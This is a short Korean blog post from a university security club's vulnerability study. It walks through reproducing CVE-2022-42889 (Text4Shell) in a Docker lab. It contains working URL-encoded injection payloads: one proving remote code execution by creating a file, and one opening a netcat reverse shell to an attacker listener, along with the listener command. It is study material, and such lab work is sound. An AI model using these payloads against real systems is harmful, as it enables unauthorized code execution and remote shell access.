원데이 취약점 분석 스터디 - 4주차

sani·2022년 11월 4일
0

2022.10.29

원데이 취약점 분석 스터디

분석 목표 :

CVE-2022–42889
(Text4Shell)

참고한 사이트 :

https://infosecwriteups.com/text4shell-poc-cve-2022-42889-f6e9df41b3b7

과정 :

위의 사이트를 따라 text4shell 취약점 트리거를 위한 환경을 구성하고 나면,
검색 부분에 임의의 텍스트를 넣을 수 있다.

이때 텍스트 부분에서 Text4Shell 취약점이 발생하게 된다.

search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec(%27touch%20%2Ftmp%2Ftest%27%29%7D

와 같은 페이로드를 전송한다면, 희생자의 docker 에 /tmp/test 가 생성된다.

이를 통해서 RCE 가 가능하다는 것을 알 수 있다.

RCE가 가능하다면, 리버스 셸 공격도 가능하다.

공격자의 환경에서

rlwrap nc -nlvp (포트)

를 실행시켜 netcat을 이용해 리스닝 시킨 후,

search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec(%27nc%20(IP주소)%20(포트)%20-e%20%2Fbin%2Fbash%27%29%7D

와 같은 페이로드를 전송한다면,

공격자의 환경에 희생자의 셸을 얻게 된다.

profile
창원대학교 보안동아리 CASPER

0개의 댓글